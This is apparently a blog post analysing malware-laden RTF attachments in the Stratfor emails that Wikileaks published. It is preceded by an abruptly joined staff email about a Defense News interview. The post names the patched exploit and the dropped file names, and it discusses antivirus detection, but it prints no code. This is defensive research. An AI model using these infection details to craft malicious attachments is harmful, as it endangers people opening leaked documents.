Defense News article by Chris Cavas, from your interview last week is pasted below.  Article appeared as a straight Q and A story, everything reads balanced and fair.  Please let me know if you have any questions or concerns.

V/r,
Courtney

The U.S. Navy's major shipbuilding and aviation programs are largely setting into stability, but questions are rising about the strategic outlook for the Navy and Marine Corps and the forces they will need in the future, all in the context of a declining defense budget.
Navy Under Secretary Robert Work is in the center of the effort to define the Navy Department's direction and map out its future roles.


Then again in May of 2011 the same exploit was used as an attachment to an email titled "Courier who led U.S. to Osama bin Laden's hideout identified" which was sent to a significant number of US government email addresses.

Both times the payload was different. The exploit is a Metasploit module. It's been patched by Microsoft since 2010.

I've been working on reverse engineering this code as well. This file does not contain VBScript macros. The most interesting tidbit I have found apart from what is already well-documented about this exploit was recovered by scraping a bit of the shell code using this Python script (Javascript needs to be enabled to see the github embed, or you can view it here instead - the extraction script was provided by Alexander Hanel, though Mr Hanel did not collaborate on this project):


This is what was recovered (another github embed that can be viewed here for those who don't trust someone else's javascript):



I am still in the process of investigating this however I am particularly interested in the creation of an executable, C:\a.exe as well as a secondary RTF file, Tripolitania.RTF. Tripolitania, incidentally, was the name for the Libyan city of Tripoli in the early 20th century, when it was an Italian colony. These Stratfor guys do seem to have an interest in history (NOTE: Tripolitania.RTF appears to be the name of the first version of this document). I've recovered a little bit of the actual text of the attachment, and it looks like it was culled from a web page from Students for a Free Tibet:

"Lobby your government leaders to speak up for Tibet and protest Chinese leaders when they travel abroad. Take part in international days of action and commemorate historic dates within the Tibet movement."

At this point very little conclusions can be drawn from this information besides the obvious: those downloading this content from Wikileaks must use significant security measures to ensure the safety and reliability of their computing systems. Media organizations, including Wikileaks, are publishing email attachments like the ones I have identified as infected with malware here as part of their coverage of these document leaks. It is possible, for example, to search and download emails and attachments from the Wikileaks site. It does not take a wild imagination to figure that those initially reviewing these documents could take significant security precautions, while such precautions become less vital through the editing process until very few precautions are taken by the end user, who expect this content to be sanitized before it is provided to them by a media organization.

When downloading and viewing these files, most are attempting to protect themselves from surveillance; things like NSA's XKEYSCORE. Few users are expecting the leaked files themselves to be a threat. While there is overlap between the sort of security precautions that would protect a computer against outside surveillance and infected files, there are significant differences. For example, if air gapping can be an effective deterrent against surveillance and some of the worst features of malware. However, the threat from surveillance is often considered transitory. After performing the task which needs to be protected from prying eyes, a user might not find it unreasonable to break their airgap and reconnect to the internet after deleting their secret files. Alternatively, a user might rely on a USB stick to transfer applications or files from the air-gapped computer to a network-available computer. All such activity are easily exploited by malicious software. To use a somewhat related analogy - Tor won't protect you from a keylogger.

This is why notification of malicious software in these files is important: so users can adjust their operational security plans to adjust for it.

There are a number of theories that could account for the presence of this malicious software. Perhaps the least-wildeyed of those theories is that Statfor employees were receiving these malicious files through email. Whether or not those employees did anything with those malicious files, they could have been retrieved by Lulzsec, who in turn provided them to Wikileaks. The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012).

That is not the only explanation. The Snowden revelations have spelled out in plain detail how the same organizations that have been very invested in the destruction of Wikileaks could very well be capable of putting malicious software into a remote server, or to redirect a file transfer so that malicious software was transferred.

This post should not be construed as a warning to avoid paying close attention to media coverage of intelligence controversies because of the threat of malicious software. Quite the opposite, really. The information contained in these "Global Intelligence Files" are of critical social importance. People around the world should be able to inform themselves without putting themselves at undue risk.

The good news is this: the malware I have so far identified is old. So old that those using the latest versions of the software noted as vulnerable earlier are very likely safe even when executing these files. I scanned a number of these files using Virus Total, and a significant number of anti-virus applications were able to detect an issue with the files. The flipside of this positive spin is that at best only half of the popular antivirus applications I used to test these files (I tested using roughly 70 antivirus programs) detected malicious software. Some files were only detected by 15 antivirus programs.

One last note: I will almost certainly be updating this post and writing additional information about what I find as I continue my research. This is very much a "work in progress". I welcome all additional information, particularly information that conflicts with or adds to what I have found so far.

NOTE: my second post on this on this topic is online, and contains further malware analysis.

Hector Monsegur, formerly sabu of Lulzsec, contacted me. Our discussion is available on my third post.

RAT Bastard

Earlier this week, several servers I maintain were targeted by automated attempts to upload a remote access trojan (RAT). The RAT is a simpl...